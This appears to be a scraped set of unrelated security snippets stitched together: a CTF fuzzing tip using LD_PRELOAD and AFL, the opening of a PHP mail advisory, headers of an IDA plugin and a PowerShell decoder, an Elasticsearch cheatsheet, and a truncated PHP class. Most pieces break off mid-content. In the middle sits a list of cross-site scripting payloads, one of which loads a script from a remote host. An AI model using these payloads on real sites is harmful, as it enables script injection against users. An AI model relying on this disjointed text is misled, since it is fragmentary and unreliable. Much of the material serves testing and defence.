Khanh Ta Quang tqkve

This challenge gave parts of the points as soon as you find a crash in the binary, which was a forking network service. With a short LD_PRELOAD library, you can bypass all the networking code and fuzz the handler function directly with afl using the qemu mode.

The basic steps:

find a libc function that gets called after all initialization is done and overwrite it. Alternatively: define a constructor and do the initialization yourself
for position-independent executables, find the load address with dl_iterate_phdr
call whatever function you want to fuzz in the binary
run afl with -Q and AFL_PRELOAD

Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

Understanding the Memory Layout of Linux Executables

Required tools for playing around with memory:

hexdump
objdump
readelf
xxd
gcore

	'''
	IDA plugin to display the calls and strings referenced by a function as hints.

	Installation: put this file in your %IDADIR%/plugins/ directory.
	Author: Willi Ballenthin <[email protected]>
	Licence: Apache 2.0
	'''
	import idc
	import idaapi
	import idautils

	## hacked together by @JohnLaTwC, Nov 2016, v 0.5
	## This script attempts to decode common PowerShell encoded scripts. This version handles:
	## * base64 data which encode unicode, gzip, or deflate encoded strings
	## * it can operate on a file or stdin
	## * it can run recursively in the event of multiple layers
	## With apologies to @Lee_Holmes for using Python instead of PowerShell
	##
	import sys
	import zlib
	import re

	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>

	# Elasticsearch Cheatsheet - an overview of commonly used Elasticsearch API commands

	# cat paths
	/_cat/allocation
	/_cat/shards
	/_cat/shards/{index}
	/_cat/master
	/_cat/nodes
	/_cat/indices
	/_cat/indices/{index}

	<?php

	require_once __DIR__ . '/vendor/autoload.php';

	class DriveFile
	{
	private $service = null;
	private $client = null;

	private $auth;